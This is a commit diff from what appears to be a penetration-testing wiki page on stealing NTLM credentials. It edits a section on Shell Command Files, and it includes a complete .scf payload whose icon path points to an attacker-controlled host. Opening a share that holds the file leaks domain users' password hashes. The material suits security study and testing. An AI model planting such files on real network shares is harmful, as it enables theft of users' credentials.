Merge pull request #252 from A1vinSmith/master

Update places-to-steal-ntlm-creds.md
This commit is contained in:
Carlos Polop 2021-10-07 13:28:51 +01:00 committed by GitHub
commit 79f06012ed
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -188,12 +188,12 @@ action=open Setup.exe
## Shell Command Files
You can save this as `something.scf` and once you open the folder explorer will try to resolve the network path for the icon.
It is possible to obtain passwords hashes of domain users or shells when writing permissions given to unauthenticated users. SCF (Shell Command Files) can perform a limited set of operations like showing the Windows desktop or opening a Windows Explorer. Save the code below as `ordinary.scf` and put it into a network share.
```text
[Shell]
Command=2
IconFile=\\35.164.153.224\test.ico
IconFile=\\AttackerIP\ordinary.ico
[Taskbar]
Command=ToggleDesktop
```